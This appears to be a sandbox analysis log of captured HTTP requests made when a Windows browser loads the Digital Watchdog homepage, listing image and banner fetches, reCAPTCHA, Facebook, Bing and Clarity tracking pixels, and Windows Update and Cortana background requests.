    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/anchor?ar=1&k=6Ld7jaQUAAAAANDjHRQN1BVVob0p2xJ5YCcJauXZ&co=aHR0cHM6Ly9kaWdpdGFsLXdhdGNoZG9nLmNvbTo0NDM.&hl=en&v=jt8Oh2-Ue1u7nEbJQUIdocyd&size=normal&cb=f6xq60bj7018 HTTP/1.1host: www.google.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7x-browser-channel: stablex-browser-year: 2025x-browser-validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=x-browser-copyright: Copyright 2025 Google LLC. All rights reserved.x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: iframesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/Network_02.jpg HTTP/1.1host: dmq883log67hn.cloudfront.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/Analog_Family_new.png HTTP/1.1host: dmq883log67hn.cloudfront.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/20240926103100dp1292485779.png HTTP/1.1host: dmq883log67hn.cloudfront.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
    Source: global trafficHTTP traffic detected: GET /assets/img/banner/DW-DW-Spectrum_Banner.mp4 HTTP/1.1host: dmq883log67hn.cloudfront.netsec-ch-ua-platform: "Windows"accept-encoding: identity;q=1, *;q=0user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: videosec-fetch-storage-access: activeaccept-language: en-US,en;q=0.9range: bytes=0-priority: i
    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/Security_03.jpg HTTP/1.1host: dmq883log67hn.cloudfront.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D; _ga_M0RPWMLFQV=GS2.1.s1748615717$o1$g0$t1748615717$j60$l0$h754319222; _gcl_au=1.1.2004574435.1748615718; _ga=GA1.2.1634229778.1748615718; _gid=GA1.2.1345043303.1748615719; _gat_gtag_UA_47457883_1=1; _uetsid=4f7948503d6311f0829297dbae7d1642; _uetvid=4f79a7e03d6311f09b8ff13ac978d915; _fbp=fb.1.1748615719969.679263426248015277; _clck=j14piw%7C2%7Cfwc%7C0%7C1976
    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/Recording_01.jpg HTTP/1.1host: dmq883log67hn.cloudfront.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/Recording_03.jpg HTTP/1.1host: dmq883log67hn.cloudfront.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/Software_02.jpg HTTP/1.1host: dmq883log67hn.cloudfront.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/IP_Family_new.png HTTP/1.1host: dmq883log67hn.cloudfront.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/20240926103313dp2042930829.png HTTP/1.1host: dmq883log67hn.cloudfront.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/20240927083602dp630400556.png HTTP/1.1host: dmq883log67hn.cloudfront.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/Software_03.jpg HTTP/1.1host: dmq883log67hn.cloudfront.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
    Source: global trafficHTTP traffic detected: GET /assets/img/banner/Starlight_Banner.jpg HTTP/1.1host: dmq883log67hn.cloudfront.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/20220616061510dp1783973937.jpg HTTP/1.1host: dmq883log67hn.cloudfront.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/Software_01.jpg HTTP/1.1host: dmq883log67hn.cloudfront.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
    Source: global trafficHTTP traffic detected: GET /assets/img/banner/DW-MEGApix-Ai_Banner.jpg HTTP/1.1host: dmq883log67hn.cloudfront.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/20220907225015dp254308958.jpg HTTP/1.1host: dmq883log67hn.cloudfront.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
    Source: global trafficHTTP traffic detected: GET /homepage_assets/DW_Spectrum_IPVMS.png HTTP/1.1host: dmq883log67hn.cloudfront.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
    Source: global trafficHTTP traffic detected: GET /assets/img/banner/DW-Built-for-users_Banner.jpg HTTP/1.1host: dmq883log67hn.cloudfront.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
    Source: global trafficHTTP traffic detected: GET /assets/img/banner/DW-Blackjack-Ai_Banner_Rav2.jpg HTTP/1.1host: dmq883log67hn.cloudfront.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/20220609044336dp295005725.jpg HTTP/1.1host: dmq883log67hn.cloudfront.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
    Source: global trafficHTTP traffic detected: GET /c.gif HTTP/1.1host: c.clarity.mssec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
    Source: global trafficHTTP traffic detected: GET /tr/?id=767361503973632&ev=PageView&dl=https%3A%2F%2Fdigital-watchdog.com%2F&rl=&if=false&ts=1748615719975&sw=1280&sh=1024&v=2.9.203&r=stable&ec=0&o=12318&fbp=fb.1.1748615719969.679263426248015277&ler=empty&cdl=API_unavailable&it=1748615719584&coo=false&exp=k2&rqm=GET HTTP/1.1host: www.facebook.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
    Source: global trafficHTTP traffic detected: GET /c.gif?ctsa=mr&CtsSyncId=87C5841D2A9441ECACD16D52A5FB4740&RedC=c.clarity.ms&MXFR=09B5A44BB37F69CD1525B1B7B77F6729 HTTP/1.1host: c.bing.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: MUID=353B7165B6BE65DD34CF6499B7CB64A4priority: i
    Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=767361503973632&ev=PageView&dl=https%3A%2F%2Fdigital-watchdog.com%2F&rl=&if=false&ts=1748615719975&sw=1280&sh=1024&v=2.9.203&r=stable&ec=0&o=12318&fbp=fb.1.1748615719969.679263426248015277&ler=empty&cdl=API_unavailable&it=1748615719584&coo=false&exp=k2&rqm=FGET HTTP/1.1host: www.facebook.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
    Source: global trafficHTTP traffic detected: GET /privacy_sandbox/topics/registration/?id=767361503973632 HTTP/1.1host: www.facebook.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
    Source: global trafficHTTP traffic detected: GET /c.gif?ctsa=mr&CtsSyncId=87C5841D2A9441ECACD16D52A5FB4740&MUID=353B7165B6BE65DD34CF6499B7CB64A4 HTTP/1.1host: c.clarity.mssec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: SM=Tcookie: MUID=09B5A44BB37F69CD1525B1B7B77F6729priority: i
    Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=4n64bYCHzBtHheW&MD=gb5sx+9d HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
    Source: global trafficHTTP traffic detected: GET /c.gif?ctsa=mr&CtsSyncId=87C5841D2A9441ECACD16D52A5FB4740&MUID=353B7165B6BE65DD34CF6499B7CB64A4 HTTP/1.1host: c.clarity.msuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: SM=Ccookie: MUID=353B7165B6BE65DD34CF6499B7CB64A4cookie: MR=0cookie: ANONCHK=0priority: u=1, i
    Source: global trafficHTTP traffic detected: GET /tr/?id=767361503973632&ev=SubscribedButtonClick&dl=https%3A%2F%2Fdigital-watchdog.com%2F&rl=&if=false&ts=1748615725161&cd[buttonFeatures]=%7B%22classList%22%3A%22peer%20dark%3Abg-input%2F30%20data-%5Bstate%3Dchecked%5D%3Atext-primary-foreground%20dark%3Adata-%5Bstate%3Dchecked%5D%3Abg-primary%20focus-visible%3Aborder-ring%20focus-visible%3Aring-ring%2F50%20aria-invalid%3Aring-destructive%2F20%20dark%3Aaria-invalid%3Aring-destructive%2F40%20aria-invalid%3Aborder-destructive%20size-4%20shrink-0%20shadow-xs%20transition-shadow%20outline-none%20focus-visible%3Aring-%5B3px%5D%20disabled%3Acursor-not-allowed%20disabled%3Aopacity-50%20bg-white%20rounded-%5B2px%5D%20border-%5B2px%5D%20border-gray-500%20w-%5B18px%5D%20h-%5B18px%5D%20data-%5Bstate%3Dchecked%5D%3Abg-white%20data-%5Bstate%3Dchecked%5D%3Aborder-gray-500%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22button%22%2C%22type%22%3A%22button%22%2C%22name%22%3A%22%22%2C%22value%22%3A%22on%22%7D&cd[buttonText]=&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22Digital%20Watchdog%20l%20Welcome%22%7D&sw=1280&sh=1024&v=2.9.203&r=stable&ec=1&o=12318&fbp=fb.1.1748615719969.679263426248015277&ler=empty&cdl=API_unavailable&it=1748615719584&coo=false&es=automatic&tm=3&exp=k2&rqm=GET HTTP/1.1host: www.facebook.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 1
    Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=767361503973632&ev=SubscribedButtonClick&dl=https%3A%2F%2Fdigital-watchdog.com%2F&rl=&if=false&ts=1748615725161&cd[buttonFeatures]=%7B%22classList%22%3A%22peer%20dark%3Abg-input%2F30%20data-%5Bstate%3Dchecked%5D%3Atext-primary-foreground%20dark%3Adata-%5Bstate%3Dchecked%5D%3Abg-primary%20focus-visible%3Aborder-ring%20focus-visible%3Aring-ring%2F50%20aria-invalid%3Aring-destructive%2F20%20dark%3Aaria-invalid%3Aring-destructive%2F40%20aria-invalid%3Aborder-destructive%20size-4%20shrink-0%20shadow-xs%20transition-shadow%20outline-none%20focus-visible%3Aring-%5B3px%5D%20disabled%3Acursor-not-allowed%20disabled%3Aopacity-50%20bg-white%20rounded-%5B2px%5D%20border-%5B2px%5D%20border-gray-500%20w-%5B18px%5D%20h-%5B18px%5D%20data-%5Bstate%3Dchecked%5D%3Abg-white%20data-%5Bstate%3Dchecked%5D%3Aborder-gray-500%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22button%22%2C%22type%22%3A%22button%22%2C%22name%22%3A%22%22%2C%22value%22%3A%22on%22%7D&cd[buttonText]=&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22Digital%20Watchdog%20l%20Welcome%22%7D&sw=1280&sh=1024&v=2.9.203&r=stable&ec=1&o=12318&fbp=fb.1.1748615719969.679263426248015277&ler=empty&cdl=API_unavailable&it=1748615719584&coo=false&es=automatic&tm=3&exp=k2&rqm=FGET HTTP/1.1host: www.facebook.comsec-ch-ua-platform: "Windows"
    Source: global trafficHTTP traffic detected: GET /tr/?id=767361503973632&ev=SubscribedButtonClick&dl=https%3A%2F%2Fdigital-watchdog.com%2F&rl=&if=false&ts=1748615725161&cd[buttonFeatures]=%7B%22classList%22%3A%22peer%20dark%3Abg-input%2F30%20data-%5Bstate%3Dchecked%5D%3Atext-primary-foreground%20dark%3Adata-%5Bstate%3Dchecked%5D%3Abg-primary%20focus-visible%3Aborder-ring%20focus-visible%3Aring-ring%2F50%20aria-invalid%3Aring-destructive%2F20%20dark%3Aaria-invalid%3Aring-destructive%2F40%20aria-invalid%3Aborder-destructive%20size-4%20shrink-0%20shadow-xs%20transition-shadow%20outline-none%20focus-visible%3Aring-%5B3px%5D%20disabled%3Acursor-not-allowed%20disabled%3Aopacity-50%20bg-white%20rounded-%5B2px%5D%20border-%5B2px%5D%20border-gray-500%20w-%5B18px%5D%20h-%5B18px%5D%20data-%5Bstate%3Dchecked%5D%3Abg-white%20data-%5Bstate%3Dchecked%5D%3Aborder-gray-500%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22button%22%2C%22type%22%3A%22button%22%2C%22name%22%3A%22%22%2C%22value%22%3A%22on%22%7D&cd[buttonText]=&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22Digital%20Watchdog%20l%20Welcome%22%7D&sw=1280&sh=1024&v=2.9.203&r=stable&ec=1&o=12318&fbp=fb.1.1748615719969.679263426248015277&ler=empty&cdl=API_unavailable&it=1748615719584&coo=false&es=automatic&tm=3&exp=k2&rqm=GET HTTP/1.1host: www.facebook.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53
    Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=767361503973632&ev=SubscribedButtonClick&dl=https%3A%2F%2Fdigital-watchdog.com%2F&rl=&if=false&ts=1748615725161&cd[buttonFeatures]=%7B%22classList%22%3A%22peer%20dark%3Abg-input%2F30%20data-%5Bstate%3Dchecked%5D%3Atext-primary-foreground%20dark%3Adata-%5Bstate%3Dchecked%5D%3Abg-primary%20focus-visible%3Aborder-ring%20focus-visible%3Aring-ring%2F50%20aria-invalid%3Aring-destructive%2F20%20dark%3Aaria-invalid%3Aring-destructive%2F40%20aria-invalid%3Aborder-destructive%20size-4%20shrink-0%20shadow-xs%20transition-shadow%20outline-none%20focus-visible%3Aring-%5B3px%5D%20disabled%3Acursor-not-allowed%20disabled%3Aopacity-50%20bg-white%20rounded-%5B2px%5D%20border-%5B2px%5D%20border-gray-500%20w-%5B18px%5D%20h-%5B18px%5D%20data-%5Bstate%3Dchecked%5D%3Abg-white%20data-%5Bstate%3Dchecked%5D%3Aborder-gray-500%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22button%22%2C%22type%22%3A%22button%22%2C%22name%22%3A%22%22%2C%22value%22%3A%22on%22%7D&cd[buttonText]=&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22Digital%20Watchdog%20l%20Welcome%22%7D&sw=1280&sh=1024&v=2.9.203&r=stable&ec=1&o=12318&fbp=fb.1.1748615719969.679263426248015277&ler=empty&cdl=API_unavailable&it=1748615719584&coo=false&es=automatic&tm=3&exp=k2&rqm=FGET HTTP/1.1host: www.facebook.comuser-agent: Mozilla/5.0 (Window
    Source: global trafficHTTP traffic detected: GET /conf/v2/asgw/fpconfig.min.json?monitorId=asgw HTTP/1.1host: fp.msedge.netorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
    Source: global trafficHTTP traffic detected: GET /apc/trans.gif?e172459cde494caacd52cf1b6fff3bd5 HTTP/1.1host: arm-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
    Source: global trafficHTTP traffic detected: GET /apc/trans.gif?e027bca440fbdc2a1e9ac2793b5ab322 HTTP/1.1host: arm-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
    Source: global trafficHTTP traffic detected: GET /apc/trans.gif?f14f23399d86440af75ec5328aeb478a HTTP/1.1host: o-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
    Source: global trafficHTTP traffic detected: GET /apc/trans.gif?619fcf35d4ae468bd65c9b68ce0d8a81 HTTP/1.1host: o-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
    Source: global trafficHTTP traffic detected: GET /apc/trans.gif?244f984382ee2ec30d947a544b48ab79 HTTP/1.1host: l-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
    Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=4n64bYCHzBtHheW&MD=gb5sx+9d HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
